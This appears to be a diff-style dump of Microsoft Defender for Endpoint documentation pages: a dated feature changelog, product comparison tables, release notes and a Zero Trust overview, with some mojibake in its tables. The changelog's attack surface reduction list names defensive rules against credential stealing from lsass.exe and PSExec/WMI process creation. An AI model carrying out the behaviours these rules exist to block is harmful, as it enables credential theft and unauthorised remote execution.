--- [Threat & Vulnerability Management API support](api/exposed-apis-list.md) <BR>Run Threat & Vulnerability Management-related API calls such as get your organization's threat exposure score or device secure score, software and device vulnerability inventory, software version distribution, device vulnerability information, and security recommendation information. For more information, see [Microsoft Tech Community blog post](https://techcommunity.microsoft.com/t5/microsoft-defender-atp/threat-amp-vulnerability-management-apis-are-now-generally/ba-p/1304615).-
-## November-December 2019
--- [Microsoft Defender for Endpoint on Mac](microsoft-defender-endpoint-mac.md) <BR> Microsoft Defender for Endpoint for Mac brings the next-generation protection to Mac devices. Core components of the unified endpoint security platform will now be available for Mac devices, including [endpoint detection and response](overview-endpoint-detection-response.md).--- [Threat & Vulnerability Management application and application version end-of-life information](../defender-vulnerability-management/tvm-security-recommendation.md) <BR>Applications and application versions which have reached their end of life (EOL) are tagged or labeled as such; so, you are aware that they will no longer be supported, and can take action to either uninstall or replace. Doing so will help lessen the risks related to various vulnerability exposures due to unpatched applications.--- [Threat & Vulnerability Management Advanced Hunting Schemas](../defender/advanced-hunting-schema-tables.md) <BR>Use the Threat & Vulnerability Management tables in the Advanced hunting schema to query about software inventory, vulnerability knowledgebase, security configuration assessment, and security configuration knowledgebase.--- [Threat & Vulnerability Management role-based access controls](user-roles.md) <BR>Use the new permissions to allow maximum flexibility to create SecOps-oriented roles, Threat & Vulnerability Management-oriented roles, or hybrid roles so that only authorized users are accessing specific data to do their task. You can also achieve even further granularity by specifying whether a Threat & Vulnerability Management role can only view vulnerability-related data, or can create and manage remediation and exceptions.-
-## October 2019
--- [Indicators for IP addresses, URLs/Domains](manage-indicators.md) <BR> You can now allow or block URLs/domains using your own threat intelligence.--- [Microsoft Threat Experts - Experts on Demand](microsoft-threat-experts.md) <BR> You now have the option to consult with Microsoft Threat Experts from several places in the portal to help you in the context of your investigation.--- [Connected Azure AD applications](connected-applications.md)<br> The **Connected applications** page provides information about the Azure AD applications connected to Microsoft Defender for Endpoint in your organization.--- [API Explorer](api-explorer.md)<br> The API explorer makes it easy to construct and execute API queries, and to test and send requests for any available Microsoft Defender for Endpoint API endpoint.-
-## September 2019
--- [Tamper Protection settings using Intune](manage-tamper-protection-intune.md)<br/>You can now turn on Tamper Protection (or turn off) for your organization in the Microsoft 365 Device Management Portal (Intune).--- [Live response](live-response.md)<BR> Get instantaneous access to a device using a remote shell connection. Do in-depth investigative work and take immediate response actions to promptly contain identified threats - real time.--- [Evaluation lab](evaluation-lab.md) <BR> The Microsoft Defender for Endpoint evaluation lab is designed to eliminate the complexities of device and environment configuration so that you can
- focus on evaluating the capabilities of the platform; running simulations; and seeing the prevention, detection, and remediation features in action.
--- [Windows Server 2008 R2 SP1](configure-server-endpoints.md) <BR> You can now onboard Windows Server 2008 R2 SP1.-
-## June 2019
--- [Threat & Vulnerability Management](next-gen-threat-and-vuln-mgt.md) <BR> A new built-in capability that uses a risk-based approach to the discovery, prioritization, and remediation of endpoint vulnerabilities and misconfigurations.--- [Device health and compliance report](machine-reports.md) The device health and compliance report provides high-level information about the devices in your organization.-
-## May 2019
--- [Threat protection reports](threat-protection-reports.md)<BR>The threat protection report provides high-level information about alerts generated in your organization.--- [Microsoft Threat Experts](endpoint-attack-notifications.md)<BR> Microsoft Threat Experts is the new managed threat hunting service in Microsoft Defender for Endpoint that provides proactive hunting, prioritization, and additional context and insights that further empower security operations centers (SOCs) to identify and respond to threats quickly and accurately. It provides an additional layer of expertise and optics that Microsoft customers can utilize to augment security operation capabilities as part of Microsoft 365.--- [Indicators](api/ti-indicator.md) <BR> APIs for indicators are now generally available.--- [Interoperability](partner-applications.md) <BR> Microsoft Defender for Endpoint supports third-party applications to help enhance the detection, investigation, and threat intelligence capabilities of the platform.-
-## April 2019
--- [Microsoft Threat Experts Targeted Attack Notification capability](endpoint-attack-notifications.md) <BR> Microsoft Threat Experts' Targeted Attack Notification alerts are tailored for organizations to provide as much information as can be quickly delivered, including the timeline, scope of breach, and the methods of intrusion, thus bringing attention to critical threats in their network.--- [Microsoft Defender for Endpoint API](api/apis-intro.md) <BR> Microsoft Defender for Endpoint exposes much of its data and actions through a set of programmatic APIs. Those APIs will enable you to automate workflows and innovate based on Microsoft Defender for Endpoint capabilities.-
-## February 2019
--- [Incidents](view-incidents-queue.md) <BR> Incident is a new entity in Microsoft Defender for Endpoint that brings together all relevant alerts and related entities to narrate the broader-attack story, giving analysts better perspective on the purview of complex threats.--- [Onboard previous versions of Windows](onboard-downlevel.md)<BR> Onboard supported versions of Windows devices so that they can send sensor data to the Microsoft Defender for Endpoint sensor.-
-## October 2018
--- [Attack surface reduction rules](attack-surface-reduction.md)<BR>All Attack surface reduction rules are now supported on Windows Server 2019.--- [Controlled folder access](enable-controlled-folders.md)<BR> Controlled folder access is now supported on Windows Server 2019.--- [Custom detection](../defender/custom-detections-overview.md)<BR>With custom detections, you can create custom queries to monitor events for any kind of behavior such as suspicious or emerging threats. This can be done by leveraging the power of advanced hunting through the creation of custom detection rules.--- [Integration with Azure Security Center](configure-server-endpoints.md)<BR> Microsoft Defender for Endpoint integrates with Azure Security Center to provide a comprehensive server protection solution. With this integration, Azure Security Center can leverage the power of Microsoft Defender for Endpoint to provide improved threat detection for Windows Servers.--- [Managed security service provider](mssp-support.md) (MSSP) support<BR> Microsoft Defender for Endpoint adds support for this scenario by providing MSSP integration. The integration allows MSSPs to take the following actions: Get access to MSSP customer's Microsoft Defender Security Center portal, fetch email notifications, and fetch alerts through security information and event management (SIEM) tools.--- [Removable device control](https://cloudblogs.microsoft.com/microsoftsecure/2018/12/19/windows-defender-atp-has-protections-for-usb-and-removable-devices/)<BR>Microsoft Defender for Endpoint provides multiple monitoring and control features to help prevent threats from removable devices, including new settings to allow or block specific hardware IDs.--- [Support for iOS and Android devices](configure-endpoints-non-windows.md)<BR> iOS and Android devices are now supported and can be onboarded to the service.--- [Threat analytics](threat-analytics.md)<BR>
-Threat Analytics is a set of interactive reports published by the Microsoft Defender for Endpoint research team as soon as emerging threats and outbreaks are identified. The reports help security operations teams assess impact on their environment and provide recommended actions to contain the impact, increase organizational resilience, and prevent specific threats.
--- There are two new attack surface reduction rules in Windows 10 version 1809:-
- - Block Adobe Reader from creating child processes
-
- - Block Office communication application from creating child processes
--- [Microsoft Defender Antivirus](microsoft-defender-antivirus-windows.md)--- Antimalware Scan Interface (AMSI) was extended to cover Office VBA macros as well. [Office VBA + AMSI: Parting the veil on malicious macros](https://cloudblogs.microsoft.com/microsoftsecure/2018/09/12/office-vba-amsi-parting-the-veil-on-malicious-macros/).-
- - Microsoft Defender Antivirus, new in Windows 10 version 1809, can now [run within a sandbox](https://www.microsoft.com/security/blog/2018/10/26/windows-defender-antivirus-can-now-run-in-a-sandbox) (preview), increasing its security.
-
- - [Configure CPU priority settings](configure-advanced-scan-types-microsoft-defender-antivirus.md) for Microsoft Defender Antivirus scans.
-
-## March 2018
--- [Advanced Hunting](../defender/advanced-hunting-query-language.md)<BR>Query data using advanced hunting in Microsoft Defender for Endpoint.--- [Attack surface reduction rules](attack-surface-reduction.md)<BR>The newly introduced attack surface reduction rules are:-
- - Use advanced protection against ransomware
-
- - Block credential stealing from the Windows local security authority subsystem (lsass.exe)
-
- - Block process creations originating from PSExec and WMI commands
-
- - Block untrusted and unsigned processes that run from USB
-
- - Block executable content from email client and webmail
--- [Automated investigation and remediation](automated-investigations.md)<BR> Use Automated investigations to investigate and remediate threats.-
- > [!NOTE]
- > Available from Windows 10, version 1803 or later.
--- [Conditional Access](conditional-access.md) <br> Enable conditional access to better protect users, devices, and data.--- [Microsoft Defender for Endpoint Community center](https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/bd-p/MicrosoftDefenderATP)<BR>The Microsoft Defender for Endpoint Community Center is a place where community members can learn, collaborate, and share experiences about the product.--- [Controlled folder access](enable-controlled-folders.md)<BR>You can now block untrusted processes from writing to disk sectors using Controlled Folder Access.--- [Onboard non-Windows devices](configure-endpoints-non-windows.md)<BR>Microsoft Defender for Endpoint provides a centralized security operations experience for Windows and non-Windows platforms. You'll be able to see alerts from various supported operating systems (OS) in Microsoft Defender Security Center and better protect your organization's network.--- [Role-based access control (RBAC)](rbac.md)<BR>Using role-based access control (RBAC), you can create roles and groups within your security operations team to grant appropriate access to the portal.--- [Microsoft Defender Antivirus](microsoft-defender-antivirus-windows.md)<BR>Microsoft Defender Antivirus now shares detection status between M365 services and interoperates with Microsoft Defender for Endpoint. For more information, see [Use next-gen technologies in Microsoft Defender Antivirus through cloud-delivered protection](cloud-protection-microsoft-defender-antivirus.md).--- Block at first sight can now block non-portable executable files (such as JS, VBS, or macros) and executable files. For more information, see [Enable block at first sight](configure-block-at-first-sight-microsoft-defender-antivirus.md).
security Why Use Microsoft Defender Antivirus https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/why-use-microsoft-defender-antivirus.md
- Title: Why you should use Microsoft Defender Antivirus together with Microsoft Defender for Endpoint
-description: For best results, use Microsoft Defender Antivirus together with your other Microsoft offerings.
----------- m365-security-- tier2-- mde-ngp Previously updated : 02/29/2024--
-# Better together: Microsoft Defender Antivirus and Microsoft Defender for Endpoint
---
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- Microsoft Defender Antivirus-
-**Platforms**
-- Windows-
-Microsoft Defender Antivirus is the next-generation protection component of [Microsoft Defender for Endpoint](/microsoft-365/security/defender-endpoint/microsoft-defender-endpoint) (Microsoft Defender for Endpoint).
-
-Although you can use a non-Microsoft antivirus solution with Microsoft Defender for Endpoint, there are advantages to using Microsoft Defender Antivirus together with Defender for Endpoint. Not only is Microsoft Defender Antivirus an excellent next-generation antivirus solution, but combined with other Defender for Endpoint capabilities, such as [endpoint detection and response](/microsoft-365/security/defender-endpoint/overview-endpoint-detection-response) and [automated investigation and remediation](/microsoft-365/security/defender-endpoint/automated-investigations), you get better protection that's coordinated across products and services.
-
-## 13 reasons to use Microsoft Defender Antivirus together with Microsoft Defender for Endpoint
-
-|#|Advantage|Why it matters|
-|--|--|--|
-|1|Antivirus signal sharing|Microsoft applications and services share signals across your enterprise organization, providing a stronger single platform. See [Insights from the MITRE ATT&CK-based evaluation of Microsoft Defender for Endpoint](https://www.microsoft.com/security/blog/2018/12/03/insights-from-the-mitre-attack-based-evaluation-of-windows-defender-atp/).|
-|2|Threat analytics and your score for devices|Microsoft Defender Antivirus collects underlying system data used by [threat analytics](/microsoft-365/security/defender-endpoint/threat-analytics) and [Microsoft Secure Score for Devices](/microsoft-365/security/defender-endpoint/tvm-microsoft-secure-score-devices). This provides your organization's security team with more meaningful information, such as recommendations and opportunities to improve your organization's security posture.|
-|3|Performance|Microsoft Defender for Endpoint is designed to work with Microsoft Defender Antivirus, so you get better performance when you use these offerings together. [Evaluate Microsoft Defender Antivirus](evaluate-microsoft-defender-antivirus.md) and [Microsoft Defender for Endpoint](/microsoft-365/security/defender-endpoint/evaluate-mde).|
-|4|Details about blocked malware|More details and actions for blocked malware are available with Microsoft Defender Antivirus and Microsoft Defender for Endpoint. [Understand malware & other threats](/microsoft-365/security/defender-endpoint/malware/understanding-malware).|
-|5|Attack surface reduction|Your organization's security team can reduce your vulnerabilities (attack surfaces), giving attackers fewer ways to perform attacks. Attack surface reduction uses cloud protection for a number of rules. [Get an overview of attack surface reduction](/microsoft-365/security/defender-endpoint/overview-attack-surface-reduction).|
-|6|Network protection|Your organization's security team can protect your network by blocking specific URLs and IP addresses. [Protect your network](/microsoft-365/security/defender-endpoint/network-protection).|
-|7|Indicators, such as file, IP address, URL, and/or certificate allow or block indicators |Your organization's security team can import threat intel, which blocks known Indicators of Compromise (IoC's) [Get an overview of Indicator of compromise (IoC)](/microsoft-365/security/defender-endpoint/manage-indicators).|
-|8|File blocking|Your organization's security team can block specific files. [Stop and quarantine files in your network](/microsoft-365/security/defender-endpoint/respond-file-alerts#stop-and-quarantine-files-in-your-network).|
-|9|Auditing events|Auditing event signals are available in [endpoint detection and response capabilities](/microsoft-365/security/defender-endpoint/overview-endpoint-detection-response). (These signals are not available with non-Microsoft antivirus solutions.)|
-|10|File recovery via OneDrive|If you are using Microsoft Defender Antivirus together with [Office 365](/Office365/Enterprise), and your device is attacked by ransomware, your files are protected and recoverable. [OneDrive Files Restore and Windows Defender take ransomware protection one step further](https://techcommunity.microsoft.com/t5/Microsoft-OneDrive-Blog/OneDrive-Files-Restore-and-Windows-Defender-takes-ransomware/ba-p/188001).|
-|11|Controlled folder access |Your organization's security team can reduce malware from encrypting end-users data by preventing unknown applications or services being able to write to protected folders. [Get an overview of controlled folder access](/microsoft-365/security/defender-endpoint/enable-controlled-folders).|
-|12|Geographic data|Compliant with ISO 270001 and data retention, geographic data is provided according to your organization's selected geographic sovereignty. See [Compliance offerings: ISO/IEC 27001:2013 Information Security Management Standards](/microsoft-365/compliance/offering-iso-27001).|
-|13|Technical support|By using Microsoft Defender for Endpoint together with Microsoft Defender Antivirus, you have one company to call for technical support. [Troubleshoot service issues](/microsoft-365/security/defender-endpoint/troubleshoot-mdatp)and [review event logs and error codes with Microsoft Defender Antivirus](/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus/).|
-
-> [!TIP]
-> If you're looking for Antivirus related information for other platforms, see:
-> - [Set preferences for Microsoft Defender for Endpoint on macOS](mac-preferences.md)
-> - [Microsoft Defender for Endpoint on Mac](microsoft-defender-endpoint-mac.md)
-> - [macOS Antivirus policy settings for Microsoft Defender Antivirus for Intune](/mem/intune/protect/antivirus-microsoft-defender-settings-macos)
-> - [Set preferences for Microsoft Defender for Endpoint on Linux](linux-preferences.md)
-> - [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md)
-> - [Configure Defender for Endpoint on Android features](android-configure.md)
-> - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)
-
-## Learn More
-
-[Microsoft Defender for Endpoint](/microsoft-365/security/defender-endpoint/microsoft-defender-endpoint)
-
-[Microsoft Defender Vulnerability Management](/microsoft-365/security/defender-endpoint/next-gen-threat-and-vuln-mgt)
security Windows Whatsnew https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/windows-whatsnew.md
- Title: What's new in Microsoft Defender for Endpoint on Windows
-description: Learn about the latest feature releases of Microsoft Defender for Endpoint on Windows Client and Server.
--- Previously updated : 11/06/2023---- m365-security-- tier3---
-# What's new in Microsoft Defender for Endpoint on Windows
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)--
-> Want to experience Defender for Endpoint? [Sign up for a free trial](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-pullalerts-abovefoldlink).
-
-This page covers the Microsoft Defender for Endpoint EDR `MsSense.exe` versions. You can also check the file information section in the monthly cumulative rollup updates in the following articles:
--- [Windows 11 release information](/windows/release-health/windows11-release-information)-- [Windows 10 updates](https://support.microsoft.com/topic/windows-10-update-history-8127c2c6-6edf-4fdf-8b9f-0f7be1ef3562)-- [Windows Server 2022 updates](https://support.microsoft.com/topic/windows-server-2022-update-history-e1caa597-00c5-4ab9-9f3e-8212fe80b2ee)-- [Windows Server 2019 updates](https://support.microsoft.com/topic/windows-10-and-windows-server-2019-update-history-725fc2e1-4443-6831-a5ca-51ff5cbcb059)-
-For the latest updates to Microsoft Defender for Endpoint all up, see [What's new in Defender for Endpoint](/microsoft-365/security/defender-endpoint/whats-new-in-microsoft-defender-endpoint)
-
-For the latest updates to Microsoft Defender for Endpoint Next-Generation Protection/Microsoft Defender Antivirus, see [Microsoft Defender Antivirus security intelligence and product updates](/microsoft-365/security/defender-endpoint/microsoft-defender-antivirus-updates)
-
-All updates contain:
--- Performance improvements-- Serviceability improvements-- Integration improvements (Cloud, [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804))-
-## Dec-2023 (Release version: 10.8672.25926.1019)
-
-|OS |KB |Release version |
-||||
-|Windows Server 2012 R2, 2016 |[KB 5005292](https://support.microsoft.com/topic/microsoft-defender-for-endpoint-update-for-edr-sensor-f8f69773-f17f-420f-91f4-a8e5167284ac)|10.8672.25926.1019|
-
-**What's new**
--- Supports Expanded User Contain capabilities-
-## Sept-2023 (Release version: 10.8560.25364.1036)
-
-|OS |KB |Release version |
-||||
-|Windows Server 2012 R2, 2016 |[KB 5005292](https://support.microsoft.com/topic/microsoft-defender-for-endpoint-update-for-edr-sensor-f8f69773-f17f-420f-91f4-a8e5167284ac)|10.8560.25364.1036|
-
-**What's new**
--- Supports User Contain availability-
-## May-2023 (Release version: 10.8295.22621.1023)
-
-|OS |KB |Release version |
-||||
-|Windows Server 2012 R2, 2016 |[KB 5005292](https://support.microsoft.com/topic/microsoft-defender-for-endpoint-update-for-edr-sensor-f8f69773-f17f-420f-91f4-a8e5167284ac)|10.8295.22621.1023|
-
-**What's new**
--- Supports new security settings management capabilities-
-## Jan/Feb-2023 (Release version: 10.8295.22621.1019)
-
-|OS |KB |Release version |
-||||
-|Windows Server 2012 R2, 2016 |[KB 5005292](https://support.microsoft.com/topic/microsoft-defender-for-endpoint-update-for-edr-sensor-f8f69773-f17f-420f-91f4-a8e5167284ac)|10.8295.22621.1019|
-
-**What's new**
--- Improved command and control security, quality fixes-
-## Dec-2022 (Release version: 10.8210.22621.1016)
-
-|OS |KB |Release version |
-||||
-|Windows Server 2012 R2, 2016 |[KB 5005292](https://support.microsoft.com/topic/microsoft-defender-for-endpoint-update-for-edr-sensor-f8f69773-f17f-420f-91f4-a8e5167284ac)|10.8210.22621.1016|
-
-**What's new**
--- Bug fixes and stability improvements-
-## Aug-2022 (Release version: 10.8210.*)
-
-|OS |KB |Release version |
-||||
-|Windows Server 2012 R2, 2016 |[KB 5005292](https://support.microsoft.com/topic/microsoft-defender-for-endpoint-update-for-edr-sensor-f8f69773-f17f-420f-91f4-a8e5167284ac)|10.8210.22621.1011|
-|Windows 11 21H2 (Cobalt)<br> (Windows 11 SV 21H2) | [KB 5016691](https://support.microsoft.com/topic/august-25-2022-kb5016691-os-build-22000-918-preview-59097044-915a-49a0-8870-49823236adbd) | 10.8210.22000.918 |
-|Server 2022 (Iron) | [KB 5016693](https://support.microsoft.com/topic/august-16-2022-kb5016693-os-build-20348-946-preview-ee90d0bc-c162-4124-b7c6-f963ee7b17ed) |10.8210.20348.946 |
-|Windows 10 20H2/21H1/21H2<br> Windows Server 20H2 (Vibranium) | [KB 5016688](https://support.microsoft.com/topic/august-26-2022-kb5016688-os-builds-19042-1949-19043-1949-and-19044-1949-preview-ec31ebdc-067d-44dd-beb0-eabcc984d843) | 10.8210.19041.1949 |
-|Windows Server 2019 (RS5) |[KB 5016690](https://support.microsoft.com/topic/august-23-2022-kb5016690-os-build-17763-3346-preview-b81d1ac5-75c7-42c1-b638-f13aa4242f42) |10.8210.17763.3346 |
-
-**What's new**
--- Added a fix to resolve a missing intermediate certificate issue with the use of "TelemetryProxyServer" on Windows Server 2012 R2 running the unified agent.-- Enhanced Endpoint DLP with ability to protect password protected and encrypted files and not label files.-- Enhanced Endpoint DLP with support for context data in audit telemetry (short evidence).-- Improved Microsoft Defender for Endpoint client authentication support for VDI devices.-- Enhanced Microsoft Defender for Endpoint's ability to identify and intercept ransomware and advanced attacks.-- The Contain feature now supports more desktop and server versions to perform the Contain action and block discovered devices when these are contained.-- Expanded the troubleshooting mode feature to additional desktop and server versions. For a complete list of supported OS versions and more information about prerequisites, see [Get started with troubleshooting mode in Microsoft Defender for Endpoint](enable-troubleshooting-mode.md).-- Live Response improvements include reduced session creation latency when using proxies, an undo Remediation manual command, support for OneDrive share in FindFile action, and improved isolation and stability.-- [Security Management for Microsoft Defender for Endpoint](security-config-management.md#configure-your-tenant-to-support-microsoft-defender-for-endpoint-security-configuration-management) now provides the ability to sync the device configuration on demand instead of waiting for a specific cadence.-
- > [!NOTE]
- > Update package KB5005292 is on a gradual rollout schedule through Windows Update. Towards the end of this schedule, the package will be published completely, including to the update catalog for manual download. For the current release, this will be in the second half of October. If you want to test the package sooner, you can use [gradual rollout controls for platform updates](configure-updates.md) to select the Preview channel.
--
-See also:
-- [What's new in Microsoft Defender for Endpoint](whats-new-in-microsoft-defender-endpoint.md)-- [What's new in Defender for Endpoint on macOS](mac-whatsnew.md)-- [What's new in Defender for Endpoint on iOS](ios-whatsnew.md)-- [What's new in Defender for Endpoint on Linux](linux-whatsnew.md)
security Zero Trust With Microsoft Defender Endpoint https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/zero-trust-with-microsoft-defender-endpoint.md
- Title: Zero Trust with Microsoft Defender for Endpoint
-description: Microsoft Defender for Endpoint contributes to a strong Zero Trust strategy and architecture.
-
- - NOCSH
----
- - m365-security
- - tier1
- - zerotrust-services
--
-adobe-target: true
--
-# Zero Trust with Microsoft Defender for Endpoint
--
-**Applies to:**
--- Microsoft Defender XDR for Endpoint-
-Microsoft Defender for Endpoint is an enterprise endpoint security platform designed to help enterprise networks prevent, detect, investigate, and respond to advanced threats.
-
-[Zero Trust](/security/zero-trust/zero-trust-overview) is a security strategy for designing and implementing the following set of security principles:
-
-| Verify explicitly | Use least privilege access | Assume breach |
-||||
-| Always authenticate and authorize based on all available data points. | Limit user access with Just-In-Time and Just-Enough-Access (JIT/JEA), risk-based adaptive policies, and data protection. | Minimize blast radius and segment access. Verify end-to-end encryption and use analytics to get visibility, drive threat detection, and improve defenses. |
-
-Defender for Endpoint is a primary component of the **Assume breach** principle and an important element of your extended detection and response (XDR) deployment with Microsoft Defender XDR.
-
-Defender for Endpoint uses the following combination of technologies built into Windows 10 and 11 and Microsoft's robust cloud service:
--- **Endpoint behavioral sensors:** Sensors embedded in Windows 10 and 11 collect and process behavioral signals from the operating system and send this sensor data to your private, isolated, cloud instance of Microsoft Defender for Endpoint.--- **Cloud security analytics:** Defender for Endpoint translates behavioral signals into insights, detections, and recommended responses to advanced threats. Defender for Endpoint uses big-data, device learning, and unique Microsoft optics across the Windows ecosystem and enterprise cloud products such as Microsoft 365.--- **Threat intelligence:** With data generated by Microsoft hunters, security teams, and partners, threat intelligence enables Defender for Endpoint to identify attacker tools, techniques, and procedures, and generate alerts that are observed in collected sensor data.-
-Defender for Endpoint and other Microsoft security solutions form a unified pre- and post-breach enterprise defense suite for Microsoft Defender XDR. This native integration across endpoints, identity, email, and applications allows you to detect, prevent, investigate, and automatically respond to sophisticated attacks.
-
-## Threat protection for Zero Trust
-
-Defender for Endpoint provides the following threat protections:
--- Core Defender Vulnerability Management, which uses a modern risk-based approach to the discovery, assessment, prioritization, and remediation of endpoint vulnerabilities and misconfigurations.-- Attack surface reduction provides the first line of defense in the stack. By ensuring configuration settings are properly set and exploit mitigation techniques are applied, the capabilities resist attacks and exploitation.-- Next-generation protection is designed to catch all types of emerging threats.-- Endpoint detection and response detect, investigate, and respond to advanced threats that may have made it past the first two security pillars. Advanced hunting provides a query-based threat-hunting tool that lets you proactively find breaches and create custom detections.-- Automated investigation and remediation help reduce the volume of alerts in minutes at scale.-- Microsoft Secure Score for Devices helps you dynamically assess the security state of your enterprise network, identify unprotected systems, and take recommended actions to improve the overall security of your organization.-- Microsoft Threat Experts provides proactive hunting, prioritization, and additional context and insights that further empower security operation centers (SOCs) to identify and respond to threats quickly and accurately.-
-## Next steps
-
-Learn more about Zero Trust and how to build an enterprise-scale strategy and architecture with the [Zero Trust Guidance Center](/security/zero-trust).
-
-For endpoint protection concepts and deployment objectives, see [Secure endpoints with Zero Trust](/security/zero-trust/deploy/endpoints).
-
-For the steps to deploy Intune for Microsoft 365 with Zero Trust, see the [Manage devices with Intune and Microsoft 365](../../solutions/manage-devices-with-intune-overview.md) solution guidance.
-
-For other Microsoft 365 capabilities that contribute to a strong Zero Trust strategy and architecture, see [Zero Trust deployment plan with Microsoft 365](../microsoft-365-zero-trust.md).
-
-For an overview of Zero Trust for Microsoft Defender XDR services, see [Zero Trust with Microsoft Defender XDR](../defender/zero-trust-with-microsoft-365-defender.md).
security Defender Vulnerability Management Capabilities https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-vulnerability-management/defender-vulnerability-management-capabilities.md
- Title: Compare Microsoft Defender Vulnerability Management plans and capabilities
-description: Compare Defender Vulnerability Management Offerings. Learn about the differences between the plans and select the plan that suits your organization's needs.
-------- m365-security-- Tier1 Previously updated : 04/02/2024--
-# Compare Microsoft Defender Vulnerability Management plans and capabilities
-
-> [!IMPORTANT]
-> This article provides a summary of vulnerability management capabilities available across different Microsoft Defender product plans; however, it's not intended to be a service description or licensing contract document. For more detailed information, see the following resources:
->
-> - [Microsoft 365 licensing guidance for security & compliance](/office365/servicedescriptions/microsoft-365-service-descriptions/microsoft-365-tenantlevel-services-licensing-guidance/microsoft-365-security-compliance-licensing-guidance)
-> - [Microsoft 365 Education](/office365/servicedescriptions/office-365-platform-service-description/microsoft-365-education)
-
-This article helps clarify the Defender Vulnerability Management capabilities included in:
--- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender Vulnerability Management](https://go.microsoft.com/fwlink/?linkid=2229011)-- [Microsoft Defender for Servers](/azure/defender-for-cloud/plan-defender-for-servers-select-plan)-
-## Start a trial
--- If you already have Defender for Endpoint Plan 2 [Try Defender Vulnerability Management Add-on trial for Defender for Endpoint Plan 2 customers](/microsoft-365/security/defender-vulnerability-management/get-defender-vulnerability-management#try-defender-vulnerability-management-add-on-trial-for-defender-for-endpoint-plan-2-customers).-- For new customers or existing Defender for Endpoint P1 or Microsoft 365 E3 customer the **Microsoft Defender Vulnerability Management Standalone is now generally available**. To try it, go to [Try Defender Vulnerability Management Standalone](/microsoft-365/security/defender-vulnerability-management/get-defender-vulnerability-management#try-defender-vulnerability-management-standalone).-
-> [!NOTE]
-> The trial offering for Microsoft Defender Vulnerability Management isn't currently available to:
->
-> - US Government customers using GCC High, and DoD
-> - Microsoft Defender for Business customers
-
-## Vulnerability Management capabilities for endpoints
-
-The table below shows the availability of Defender Vulnerability Management capabilities for endpoints:
-
-|Capability| Defender for Endpoint Plan 2 includes the following core Defender Vulnerability Management capabilities| Defender Vulnerability Management Add-on provides the following premium Vulnerability Management capabilities for Defender for Endpoint Plan 2 | Defender Vulnerability Management Standalone provides full Defender Vulnerability Management capabilities for any EDR solution |
-|:-|:-:|:-:|:-:|
-|[Device discovery](../defender-endpoint/device-discovery.md)|Γ£ö|-|Γ£ö|
-|[Device inventory](../defender-endpoint/machines-view-overview.md)|Γ£ö|-|Γ£ö|
-|[Vulnerability assessment](tvm-weaknesses.md)|Γ£ö|-|Γ£ö|
-|[Configuration assessment](tvm-microsoft-secure-score-devices.md)|Γ£ö|-|Γ£ö|
-|[Risk based prioritization](tvm-security-recommendation.md)|Γ£ö|-|Γ£ö|
-|[Remediation tracking](tvm-remediation.md)|Γ£ö|-|Γ£ö|
-|[Continuous monitoring](../defender-endpoint/configure-vulnerability-email-notifications.md)|Γ£ö|-|Γ£ö|
-|[Software inventory](tvm-software-inventory.md)|Γ£ö|-|Γ£ö|
-|[Software usages insights](tvm-usage-insights.md)|Γ£ö|-|Γ£ö|
-|[Security baselines assessment](tvm-security-baselines.md)|-|Γ£ö|Γ£ö|
-|[Block vulnerable applications](tvm-block-vuln-apps.md)|-|Γ£ö|Γ£ö **see note** <sup>1</sup>|
-|[Browser extensions assessment](tvm-browser-extensions.md)|-|Γ£ö|Γ£ö|
-|[Digital certificate assessment](tvm-certificate-inventory.md)|-|Γ£ö|Γ£ö|
-|[Network share analysis](tvm-network-share-assessment.md)|-|Γ£ö|Γ£ö|
-|[Hardware and firmware assessment](tvm-hardware-and-firmware.md)|-|Γ£ö|Γ£ö|
-|[Authenticated scan for Windows](windows-authenticated-scan.md)|-|Γ£ö|Γ£ö|
-
-> [!NOTE]
-> <sup>1</sup> Block vulnerable applications requirement: For Defender Vulnerability Management standalone customers, to use block vulnerable applications Microsoft Defender Antivirus must be configured in active mode. For more information, see [Microsoft Defender Antivirus Windows](../defender-endpoint/microsoft-defender-antivirus-windows.md#comparing-active-mode-passive-mode-and-disabled-mode).
-
-> [!NOTE]
-> Microsoft 365 Business Premium and the standalone version of Microsoft Defender for Business include the capabilities that are listed under **Defender for Endpoint Plan 2** in the preceding table.
-
-## Vulnerability Management capabilities for servers
-
-For Microsoft Defender for Cloud customers, Defender Vulnerability Management is natively integrated within Defender for Cloud to perform vulnerability assessments for cloud based virtual machines and recommendations will automatically populate in the Defender for Cloud portal.
-
-Defender Vulnerability Management premium capabilities are available to server devices with Microsoft Defender for Servers Plan 2.
-
-> [!NOTE]
-> Client devices will require the Defender Vulnerability Management add-on license to access Defender Vulnerability Management premium capabilities.
->
-> To use the premium vulnerability management capabilities for your client devices, see [Try Defender Vulnerability Management Add-on trial for Defender for Endpoint Plan 2 customers](/microsoft-365/security/defender-vulnerability-management/get-defender-vulnerability-management#try-defender-vulnerability-management-add-on-trial-for-defender-for-endpoint-plan-2-customers).
-
-The capabilities are only available through the [Microsoft Defender 365 portal](https://security.microsoft.com/homepage).
-
-The table below shows the availability of Defender Vulnerability Management capabilities across the Defender for Servers plans.
-
-|Capability|Defender For Servers Plan 1|Defender For Servers Plan 2|
-|:-|:-:|:-:|
